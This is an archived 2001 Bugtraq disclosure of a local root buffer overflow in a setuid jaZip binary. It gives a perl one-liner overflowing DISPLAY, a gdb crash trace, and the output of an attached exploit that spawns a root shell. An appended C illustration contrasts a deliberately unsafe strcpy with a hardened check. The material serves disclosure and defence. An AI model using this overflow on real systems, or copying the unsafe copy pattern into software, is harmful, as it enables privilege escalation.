Date:         Sun, 14 Jan 2001 17:05:48 +0000
From: teleh0r <teleh0r@DOGLOVER.COM>
Subject:      Vulnerability in jaZip.
To: BUGTRAQ@SECURITYFOCUS.COM


Dear Bugtraq,

jaZip is a program for managing an Iomega Zip or Jaz drive.
It is often installed setuid root - and because of a buffer
overflow it is possible for regular users to become root.

Please excuse me if this was known. Please note that I cannot
guarantee that this information is correct.

Tested rpm:
ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/RPMS/jaZip-0.32-2.i386.rpm

  [root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
  [root@localhost /root]# gdb /usr/X11R6/bin/jazip
  GNU gdb 19991004
  Copyright 1998 Free Software Foundation, Inc.
  (gdb) r
  Starting program: /usr/X11R6/bin/jazip

  Program received signal SIGSEGV, Segmentation fault.
  0x41414141 in ?? ()
  ----
  [teleh0r@localhost teleh0r]$ rpm -q jaZip
  jaZip-0.32-2
  [teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
  Address: 0xbffff7ac
  bash#

Exploit attached.

Sincerely yours,
teleh0r

--
To avoid criticism, do nothing, say nothing, be nothing.
                -- Elbert Hubbard
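As an added illustration of the bug class the post describes (this is not jaZip's source, which the post does not include): a setuid program that copies the DISPLAY environment variable into a fixed-size buffer with no length check, shown beside a bounded, validated copy that rejects the 2100-byte value used in the post's test. The buffer size and the function names are assumptions made for this example.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for this illustration; the real size in
 * jaZip 0.32 is not given in the post. */
#define DISPLAY_BUF 256

/* The bug class from the post: a setuid program copies an environment
 * variable it does not control into a fixed buffer with no bound.
 * Illustrative only; never call this with untrusted input. */
void copy_display_unsafe(char *dst) {
    const char *d = getenv("DISPLAY");
    if (d != NULL)
        strcpy(dst, d);   /* overflows dst once strlen(d) >= DISPLAY_BUF */
}

/* Hardened form: refuse a value that does not fit, and accept only the
 * characters an X display name needs (host, ':', number, '.', screen).
 * Returns 0 on success, -1 if the value is absent, too long or malformed. */
int copy_display_checked(const char *display, char *dst, size_t dstlen) {
    size_t n;
    if (display == NULL || dstlen == 0)
        return -1;
    for (n = 0; n < dstlen; n++) {
        unsigned char c = (unsigned char)display[n];
        if (c == '\0')
            break;
        if (!isalnum(c) && c != ':' && c != '.' && c != '-' &&
            c != '_' && c != '/')
            return -1;
    }
    if (n == dstlen)      /* no terminator inside the buffer: too long */
        return -1;
    memcpy(dst, display, n + 1);
    return 0;
}

/* Convenience check against a DISPLAY_BUF-sized buffer: 1 if accepted. */
int display_accepted(const char *display) {
    char buf[DISPLAY_BUF];
    return copy_display_checked(display, buf, sizeof buf) == 0;
}

/* Builds the shape of the post's test input (2100 'A's, constructed here
 * rather than read from the environment) and returns 1 if the checked
 * copy rejects it, 0 otherwise. */
int overlong_display_is_rejected(void) {
    char *big = malloc(2101);
    int rejected;
    if (big == NULL)
        return 0;
    memset(big, 'A', 2100);
    big[2100] = '\0';
    rejected = !display_accepted(big);
    free(big);
    return rejected;
}
```

Removing the setuid bit from the binary until a fixed package is available limits the impact of this class of bug regardless of where the unchecked copy sits.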